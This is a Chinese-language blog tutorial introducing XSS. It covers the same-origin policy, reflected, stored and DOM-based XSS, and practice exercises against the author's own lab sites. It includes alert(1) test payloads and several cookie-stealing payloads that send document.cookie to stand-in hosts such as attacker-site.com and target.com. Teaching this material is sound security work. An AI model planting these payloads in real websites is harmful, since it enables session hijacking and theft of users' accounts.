<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<script>
    (function(){
        if('twosecurity'){
            if (prompt('请输入文章密码') !== 'twosecurity'){
                alert('密码错误');
                history.back();
            }
        }
    })();
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="漏洞," />





  <link rel="alternate" href="/atom.xml" title="Sn1per's Blog" type="application/atom+xml" />






<meta name="description" content="XSS 作为当今最火的漏洞，却在发现之初十分不受重视。因为其不稳定的成功率，没有什么自动化攻击手段以及大多需要和用户交互的攻击手法使得其处于一个鸡肋的尴尬地位。直至后来的 web2.0 时代，各大著名 网站相继沦陷， XSS 才逐渐进入众多安全人员的研究项目之中。">
<meta name="keywords" content="漏洞">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS漏洞入门">
<meta property="og:url" content="http:&#x2F;&#x2F;yoursite.com&#x2F;2019&#x2F;01&#x2F;25&#x2F;XSS1&#x2F;index.html">
<meta property="og:site_name" content="Sn1per&#39;s Blog">
<meta property="og:description" content="XSS 作为当今最火的漏洞，却在发现之初十分不受重视。因为其不稳定的成功率，没有什么自动化攻击手段以及大多需要和用户交互的攻击手法使得其处于一个鸡肋的尴尬地位。直至后来的 web2.0 时代，各大著名 网站相继沦陷， XSS 才逐渐进入众多安全人员的研究项目之中。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https:&#x2F;&#x2F;assets.course.twosecurity.io&#x2F;c1f6b00ede56c722f46d95d5f50eb9c5&#x2F;image&#x2F;12.png">
<meta property="og:image" content="https:&#x2F;&#x2F;assets.course.twosecurity.io&#x2F;c1f6b00ede56c722f46d95d5f50eb9c5&#x2F;image&#x2F;4.png">
<meta property="og:image" content="https:&#x2F;&#x2F;ws1.sinaimg.cn&#x2F;large&#x2F;005SzXCWgy1fziwvx1k9mj319j0lumxl.jpg">
<meta property="og:image" content="https:&#x2F;&#x2F;assets.course.twosecurity.io&#x2F;c1f6b00ede56c722f46d95d5f50eb9c5&#x2F;image&#x2F;10.png">
<meta property="og:image" content="https:&#x2F;&#x2F;assets.course.twosecurity.io&#x2F;c1f6b00ede56c722f46d95d5f50eb9c5&#x2F;image&#x2F;6.png">
<meta property="og:image" content="https:&#x2F;&#x2F;assets.course.twosecurity.io&#x2F;c1f6b00ede56c722f46d95d5f50eb9c5&#x2F;image&#x2F;7.png">
<meta property="og:updated_time" content="2019-01-25T09:23:28.103Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https:&#x2F;&#x2F;assets.course.twosecurity.io&#x2F;c1f6b00ede56c722f46d95d5f50eb9c5&#x2F;image&#x2F;12.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/01/25/XSS1/"/>





  <title>XSS漏洞入门 | Sn1per's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>
    <a href="https://github.com/1sniper" target="_blank" rel="noopener" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewBox="0 0 250 250" style="fill:#151513; color:#fff; position: absolute; top: 0; border: 0; left: 0; transform: scale(-1, 1);" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style></a>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Sn1per's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">我手举一枝花，等你带我去流浪</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" target="_blank" rel="noopener" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/01/25/XSS1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Sn1per">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/gogogo.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Sn1per's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">XSS漏洞入门</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-01-25T00:00:00+08:00">
                2019-01-25
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0/" itemprop="url" rel="index">
                    <span itemprop="name">技术文章</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>XSS 作为当今最火的漏洞，却在发现之初十分不受重视。因为其不稳定的成功率，没有什么自动化攻击手段以及大多需要和用户交互的攻击手法使得其处于一个鸡肋的尴尬地位。直至后来的 web2.0 时代，各大著名 网站相继沦陷， XSS 才逐渐进入众多安全人员的研究项目之中。</p>
<a id="more"></a>

<h2 id="为什么会有XSS漏洞？"><a href="#为什么会有XSS漏洞？" class="headerlink" title="为什么会有XSS漏洞？"></a>为什么会有XSS漏洞？</h2><h3 id="同源策略"><a href="#同源策略" class="headerlink" title="同源策略"></a>同源策略</h3><p>利用 XSS 漏洞，可以通过在目标网站上执行自己的脚本，从而突破同源策略的限制。</p>
<p>浏览器有一个很重要的概念——同源策略(Same-Origin Policy)。所谓同源是指，<strong>域名，协议，端口都相同</strong>。不同源的客户端脚本(javascript、ActionScript)在没明确授权的情况下，不能读写对方的资源。</p>
<p>如果两个页面的协议，端口（如果有指定）和域名都相同，则两个页面具有相同的源。</p>
<p>下表给出了相对<a href="http://store.company.com/dir/page.html" target="_blank" rel="noopener">http://store.company.com/dir/page.html</a>同源检测的示例。  </p>
<table>
<thead>
<tr>
<th>URL</th>
<th>结果</th>
<th>原因</th>
</tr>
</thead>
<tbody><tr>
<td><a href="http://store.company.com/dir2/other.html" target="_blank" rel="noopener">http://store.company.com/dir2/other.html</a></td>
<td>成功</td>
<td></td>
</tr>
<tr>
<td><a href="http://store.company.com/dir/inner/another.html" target="_blank" rel="noopener">http://store.company.com/dir/inner/another.html</a></td>
<td>成功</td>
<td></td>
</tr>
<tr>
<td><a href="https://store.company.com/secure.html" target="_blank" rel="noopener">https://store.company.com/secure.html</a></td>
<td>失败</td>
<td>不同协议( https和http )</td>
</tr>
<tr>
<td><a href="http://store.company.com:81/dir/etc.html" target="_blank" rel="noopener">http://store.company.com:81/dir/etc.html</a></td>
<td>失败</td>
<td>不同端口 ( 81和80)</td>
</tr>
<tr>
<td><a href="http://news.company.com/dir/other.html" target="_blank" rel="noopener">http://news.company.com/dir/other.html</a></td>
<td>失败</td>
<td>不同域名 ( news和store )</td>
</tr>
</tbody></table>
<h2 id="XSS介绍"><a href="#XSS介绍" class="headerlink" title="XSS介绍"></a>XSS介绍</h2><p>XSS也就是跨站脚本，一般发生在浏览器层面，通常是由于用户可以在网站上可以提交各种各样的内容，但如果web服务端没有正确的处理用户输入的数据（没有做过滤或是其它转义处理没有正确的处理用户输入的数据），导致攻击脚本在浏览器中执行。</p>
<p>XSS 是一类主要的应用程序安全缺陷，常与其他漏洞一起造成更大的影响。它困扰着现在大多数的应用程序，比如非常注重安全的银行站点和互动性非常强的社交网站。与 SQL 注入不同的时候它更多时候被用于攻击同一站点内的其它用户，如微博、QQ空间等。的微博有时候在不知情的情况下关注了其它用户，或是QQ空间莫名转发了某条广告，那么通常就是受到了 XSS 漏洞的攻击。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">漏洞范例</span><br><span class="line">问： &lt;p style=&apos;color:red&apos;&gt;你好啊，尊敬的______&lt;/p&gt;</span><br><span class="line">答：&lt;p style=&apos;color:red&apos;&gt;你好啊，尊敬的 xxx&lt;script&gt;alert(1)&lt;/script&gt;&lt;/p&gt;</span><br></pre></td></tr></table></figure>

<p>攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。</p>
<h2 id="XSS的分类"><a href="#XSS的分类" class="headerlink" title="XSS的分类"></a>XSS的分类</h2><p>XSS漏洞可以分为3种类型：反射型、存储型和基于DOM的XSS漏洞。他们看似有些特点相同，但在确定以及利用漏洞方面仍存在差异。</p>
<h3 id="反射型XSS"><a href="#反射型XSS" class="headerlink" title="反射型XSS"></a>反射型XSS</h3><p><strong>反射型XSS攻击过程示意图</strong></p>
<p><img src="https://assets.course.twosecurity.io/c1f6b00ede56c722f46d95d5f50eb9c5/image/12.png" alt="img"></p>
<blockquote>
<p>练习题：<a href="http://news.twosecurity.xyz/search?id=2" target="_blank" rel="noopener">http://news.twosecurity.xyz/search?id=2</a></p>
<p>Payload：<a href="http://news.twosecurity.xyzsearch?id=2<script>alert(1)</script>" target="_blank" rel="noopener">Payload</a></p>
<p>XSS漏洞的主要成因：没有实施过滤或净化措施或过滤不严格。</p>
</blockquote>
<p>当应用程序使用动态页面向用户显示搜索结果时，便会造成一种常见的XSS漏洞。这个页面会使用一个包含搜索关键字的参数，并且在响应过程中将文本返回给用户。这种机制对开发者而言非常方便，因为它允许从应用程序里调用一个定制的结果页面，而不用把搜索关键字里的消息硬编码。</p>
<p>提取用户提交的输入并将其插入到服务器响应的HTML代码，这是XSS漏洞的一个明显特征；如果应用程序没有实施任何过滤或净化措施，那便很容易受到攻击。可以肯定，如果该页面在用户的浏览器里显示，弹出消息便会出现以上情况。</p>
<p>这个简单的测试可以解释一些问题。首先是id参数的内容可用任何数据替代返回给浏览器；其次，无论服务器端应用程序如何处理这些数据，都无法阻止提交JavaScript代码，一旦错误页面在浏览器中显示，这些代码就会执行。</p>
<blockquote>
<p>练习题：<a href="https://XSS.twosecurity.xyz/topic3?XSS=3" target="_blank" rel="noopener">XSS输出在script标签中</a></p>
<p>Payload：<a href="https://XSS.twosecurity.xyz/topic3?XSS=alert%601%60" target="_blank" rel="noopener">Payload</a></p>
<p>详解：查看源码发现输出在script标签中,尝试alert(1)直接弹窗发现过滤了括号,尝试⽤反引号,但是⻚⾯400,这⾥<br>是云服务的问题，需要把反引号进⾏url编码。</p>
</blockquote>
<p>在现实世界的Web应用程序中，存在近75%的XSS漏洞属于这种简单的XSS bug。因为利用这种漏洞通常需要包含一段Javascript的利用代码，然后这些代码会将用户cookie等信息发送到攻击者的服务器。攻击代码通常是一个单独的请求与响应进行传送和执行。</p>
<h3 id="存储型XSS"><a href="#存储型XSS" class="headerlink" title="存储型XSS"></a>存储型XSS</h3><p>第二种类型的XSS漏洞叫做存储型XSS。如果一名用户提交的数据被保存在应用程序中，数据通常会保存在一个后端数据库中，然后没有经过适当的过滤或净化就显示给其他用户，便会出现这种漏洞。</p>
<p>存储型XSS漏洞常见于支持用户互动的Web应用，或者在具有管理权限的员工访问用户记录和数据的应用程序中。以一个留言应用程序为例，它允许用户留言，然后其它用户和管理员都可以看到相关的留言。如果用户的留言中包含XSS攻击代码，而服务端没有过滤或净化这个数据，那么攻击者就可以借此发送包含JS攻击代码的留言，在查看过该留言的用户和管理员的浏览器中执行任意脚本。在这种情况下，攻击者就可以在用户不知情的情况下获得他的登录身份进行攻击。</p>
<p>一般情况下，存储型XSS漏洞的攻击通常分为两步。第一步攻击者在传入包含恶意代码的数据到应用，Web应用会保存这些数据。第二步，会有用户查看包含恶意代码的数据页面，这时恶意代码开始执行。</p>
<p><strong>存储型XSS攻击过程示意图</strong></p>
<p><img src="https://assets.course.twosecurity.io/c1f6b00ede56c722f46d95d5f50eb9c5/image/4.png" alt="img"></p>
<p>下面这个示例包含一项搜索功能，可用于显示当前用户输入的查询，以及其他用户最近输入的查询列表。由于查询将按原样显示，应用程序容易受到反射型和存储型XSS攻击。</p>
<p><img src="https://ws1.sinaimg.cn/large/005SzXCWgy1fziwvx1k9mj319j0lumxl.jpg" alt="img"></p>
<p>反射型与存储型XSS攻击在实施步骤上有两个重要的区别，使得存储型XSS攻击更加危险。首先，反射型XSS攻击要利用一个漏洞时，直接利用容易暴露，我们会选择某种方式诱使用户访问经过设计的URL。而存储型XSS攻击则没有这种要求。展开攻击后，只需要等待用户浏览该页面或功能，通常，这个页面是正常用户会主动访问的常规页面。</p>
<p>其次，如果用户在被攻击时已经登录了某社交网站，那么攻击者就更容易利用XSS漏洞达到攻击的目的。例如，如果用户当前正在看微博，那么攻击者就可以劫持用户的身份，以这个用户的身份登录这个网站。在反射型XSS攻击中，攻击者可能会诱导用户登陆并且单击他们提供的一个链接，来达到目的。但是，在存储型XSS攻击中，因为攻击代码被保存在用户自主访问的一个微博页面中，可能是相册之类，当攻击代码执行时，用户已经在登录了微博。</p>
<p>这些区别意味着存储型XSS漏洞存在比反射型XSS更加不易被发现。许多时候，攻击者可以向应用程序提交一些精心构造过的数据，然后等待用户访问它们。如果恰好用户是管理员，那么攻击者就能够完全攻破整个应用程序了。</p>
<blockquote>
<p>练习题：<a href="http://news.twosecurity.xyz/Message_board" target="_blank" rel="noopener">在留言板中植入存储型XSS</a></p>
<p>Payload：&lt;a href=# onclick=&quot;document.location=&#39;<a href="http://attacker-site.com/xss.php?c=\&#39;+escape\(document.cookie\)\;\&quot;&gt;美女admin" target="_blank" rel="noopener">http://attacker-site.com/xss.php?c=\&#39;+escape\(document.cookie\)\;\&quot;&gt;美女admin</a> </a></p>
</blockquote>
<h3 id="基于DOM的XSS"><a href="#基于DOM的XSS" class="headerlink" title="基于DOM的XSS"></a>基于DOM的XSS</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">注解：什么是DOM</span><br><span class="line">文档对象模型（Document Object Model，简称DOM），是W3C组织推荐的处理可扩展标志语言的标准编程接口</span><br></pre></td></tr></table></figure>

<p>基于DOM的XSS不具有之前提到的两类漏洞的特点，在这种漏洞中，攻击者的JavaScript通过一些DOM处理后才能执行。首先，用户请求一个包含JavaScript的特殊URL，会由攻击者提交。然后服务器响应里不会包含攻击者的脚本，当用户的浏览器处理该响应时，这段攻击代码被前端JS里的DOM处理操作引发。</p>
<p>客户端Javascript能够访问浏览器的文本对象模型也就是DOM，它能够决定加载页面的URL。由应用程序发布的脚本可以从URL中提取数据，对这些数据进行处理后，让它动态更新页面的内容。这样应用程序就容易受到基于DOM的XSS攻击。</p>
<p><strong>DOM树</strong></p>
<p><img src="https://assets.course.twosecurity.io/c1f6b00ede56c722f46d95d5f50eb9c5/image/10.png" alt="img"></p>
<p><strong>DOM使用范例</strong></p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">type</span>=<span class="string">"text/javascript"</span>&gt;</span></span><br><span class="line"><span class="actionscript">     <span class="function"><span class="keyword">function</span> <span class="title">show</span><span class="params">()</span></span></span></span><br><span class="line">     &#123;</span><br><span class="line"><span class="javascript">      <span class="keyword">var</span> name = <span class="built_in">document</span>.getElementById(<span class="string">"name"</span>);</span></span><br><span class="line"><span class="javascript">      <span class="keyword">var</span> div = <span class="built_in">document</span>.getElementById(<span class="string">"place"</span>);</span></span><br><span class="line">      div.innerHTML = name.value;</span><br><span class="line">     &#125;</span><br><span class="line"> <span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"> name：<span class="tag">&lt;<span class="name">input</span> <span class="attr">id</span>=<span class="string">"name"</span>/&gt;</span></span><br><span class="line"> <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"submit"</span> <span class="attr">value</span>=<span class="string">"submit"</span> <span class="attr">onclick</span>=<span class="string">"show()"</span>/&gt;</span></span><br><span class="line"> <span class="tag">&lt;<span class="name">div</span> <span class="attr">id</span>=<span class="string">"place"</span>&gt;</span> <span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>功能：将名字通过参数传入到输入框，并使用JavaScript动态输出name。</p>
<p>这段脚本首先提取出ID为text的输入框的值，并把这个值写入页面的DOM中。如果按开发者预想的方式调用，URL中的name参数会被带入到输入框中。但是，如果攻击者在name 中插入一段HTML，那么这段代码将被动态写入页面中，并像服务器返回代码一样得以执行。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">注解：</span><br><span class="line">svg标签：矢量图参考</span><br><span class="line">iframe标签：浮动框架参考</span><br><span class="line">innerHTML属性：设置或返回表格行的开始和结束标签之间的 HTML参考</span><br></pre></td></tr></table></figure>

<p><strong>基于DOM的XSS漏洞的利用过程</strong></p>
<p><img src="https://assets.course.twosecurity.io/c1f6b00ede56c722f46d95d5f50eb9c5/image/6.png" alt="img"></p>
<p>与存储型XSS漏洞相比，基于DOM的XSS漏洞与反射型XSS漏洞有更大的相似性。利用它们通常需要攻击者诱使一名用户访问一个包含恶意代码的专门设计的URL，并由服务器响应那个确保恶意代码得以执行的特殊请求。但是，在利用反射型与基于DOM的XSS漏洞的细节方面，还存在一些重要的差异，这点在稍后讨论。</p>
<blockquote>
<p>练习题：<a href="https://xss.twosecurity.xyz/topic6" target="_blank" rel="noopener">Xss输出在inner html中</a></p>
<p>Payload：<a href="https://xss.twosecurity.xyz/topic6?name=%3Cimg%20src=1%20onerror=alert(1)%3E" target="_blank" rel="noopener">Payload</a></p>
<p>详解：innerHTML 属性设置或返回表格⾏的开始和结束标签之间的 HTML。这⾥就是在div标签之间插⼊input标<br>签⾥的value值传⼊script alert⼀套没有弹框，原因如下：w3c规范innerHTML这个api插⼊的script标签<br>不会被执⾏但是我们可以使⽤其他事件弹框，如来触发js。</p>
</blockquote>
<h2 id="反射型-存储型-DOM-型区别总结"><a href="#反射型-存储型-DOM-型区别总结" class="headerlink" title="反射型/存储型/ DOM 型区别总结"></a>反射型/存储型/ DOM 型区别总结</h2><p>反射型通常需要在URL中带入攻击代码，存储型多发生在如发贴/保存资料/发送消息等网站模块，比反射型更加隐蔽。DOM XSS 有可能是反射型也有可能是存储型，但一定会经过 DOM API 处理，然后触发 XSS。</p>
<p>有很多种利用XSS漏洞攻击网站其他用户的方式。最简单的一种，也是我们常用于说明XSS漏洞潜在影响的一种攻击，可导致攻击者截获通过验证的用户的会话令牌，通常会存放在网页的 cookie 中。在劫持用户的cookie后，攻击者就可以访问该用户经授权访问的所有数据和功能。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">注解：包含会话令牌的cookie</span><br><span class="line">http://news.twosecurity.xyz/search_res?keyword=2%3Cscript%3Enew+Image().src=%22http://target.com/%22%2bdocument.cookie;%3C/script%3E</span><br></pre></td></tr></table></figure>

<p>用户正常登陆应用程序时，attacker.com会得到一个包含会话令牌的cookie.</p>
<p>我们经常在登陆某个网页时都会看到一个记住登陆状态的选项，这是应用程序在保存一个持久性cookie，在用户每次访问时重新进行有效验证。这时，即使目标用户未处于活动状态或者没有登陆应用程序，攻击者都可以成功实现其目标。使用这种cookie的应用程序更容易受到XSS漏洞的影响。</p>
<p>有人会疑惑，如果攻击者能够诱使用户访问他选择的URL，为什么他还要大费力气通过应用程序中的XSS漏洞传送自己的攻击代码呢？为什么他不在attatcker.com上保存一段恶意脚本，并向用户传送一个直接指向这段脚本的链接呢？这段脚本不是可以和上例中的脚本一样执行吗？为什么需要利用XSS漏洞？</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">注解：</span><br><span class="line">不同源的站点之间无法共享cookie，DOM等信息（参考课程开头的同源策略）</span><br></pre></td></tr></table></figure>

<p>为防止不同域在用户浏览器中彼此干扰，浏览器会对从不同来源收到的内容进行隔离，攻击者的目的是截获用户的会话令牌。浏览器不允许任何旧有脚本访问一个站点的cookie，否则，会话就很容易被劫持。而且，只有发布cookie的站点能够访问这些cookie：仅在返回发布站点的HTTP请求中提交cookie；只有通过该站点返回的页面所包含或加载的JavaScript才能访问cookie。因此，如果直接在attatcker.com上的通过脚本获取document.cookie，它将无法获得twosecurity.xyz发布的cookie，劫持攻击也不会成功。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">举例解析如何跨站</span><br><span class="line">newImage().src=&quot;http://target.com/XSS_stealcookie?cookie=&quot;+document.cookie;</span><br><span class="line">XSS_stealcookie为接收所窃取cookie的脚本，此时target.com便访问到了twosecurity.xyz的cookie</span><br></pre></td></tr></table></figure>

<p>就用户的浏览器而言，利用XSS漏洞的攻击之所以取得成功，是因为当用户请求攻击者的URL时，浏览恶意JavaScript是由twosecurity.xyz送交给它的。当用户请求攻击者的URL时，浏览器向attatcker.com提交一个请求，然后应用程序返回包含一段JavaScript的页面。和从twosecurity.xyz收到的任何JavaScript一样，浏览器会执行这段脚本，因为用户信任twosecurity.xyz。这也就是为何攻击的脚本能够访问twosecurity.xyz发布的cookie的原因，虽然它实际来自其他地方。这也是为何该漏洞被称作跨站点脚本的原因。</p>
<p>开发者通常认为不必担心低危XSS漏洞，浏览器会防御他们，而事实上XSS漏洞可以影响任何类型的Web应用程序；在某些情况下，即使漏洞并没有什么风险，也会为其它类型的攻击打下基础。</p>
<h2 id="思维导图"><a href="#思维导图" class="headerlink" title="思维导图"></a>思维导图</h2><p><strong>以下图片展示了XSS的测试流程</strong></p>
<p><img src="https://assets.course.twosecurity.io/c1f6b00ede56c722f46d95d5f50eb9c5/image/7.png" alt="img"></p>
<h2 id="扩展学习"><a href="#扩展学习" class="headerlink" title="扩展学习"></a>扩展学习</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">扩展学习——《浏览器的同源策略》 ：https://developer.mozilla.org/zh-CN/docs/Web/Security/Same-origin_policy</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">扩展学习——《XSS与字符编码的那些事儿》：http://resource-host-smartgslb-com-static.smartgslb.com/resources/XSS_and_Character_Encoding.pdf</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">扩展学习——《QQ邮箱word附件预览 XSS》 ：http://resource.host.smartgslb.com/resources/qqmail_word_xss.pdf</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">扩展学习——《如何防御 XSS》：http://resource.host.smartgslb.com/resources/how_to_anti_xss.pdf</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xss漏洞入门拓展练习题https://xss-quiz.int21h.jp/</span><br></pre></td></tr></table></figure>


      
    </div>
    
    
    

    
      <div>
        <div id="wechat_subscriber" style="display: block; padding: 10px 0; margin: 20px auto; width: 100%; text-align: center">
    <img id="wechat_subscriber_qcode" src="/uploads/wechat.png" alt="Sn1per wechat" style="width: auto; height:350px; max-width: 100%;"/>
    <div>欢迎关注微信公众号<b>星盟安全</b>！VENI VIDI VICI</div>
</div>
      </div>
    

    
      <div>
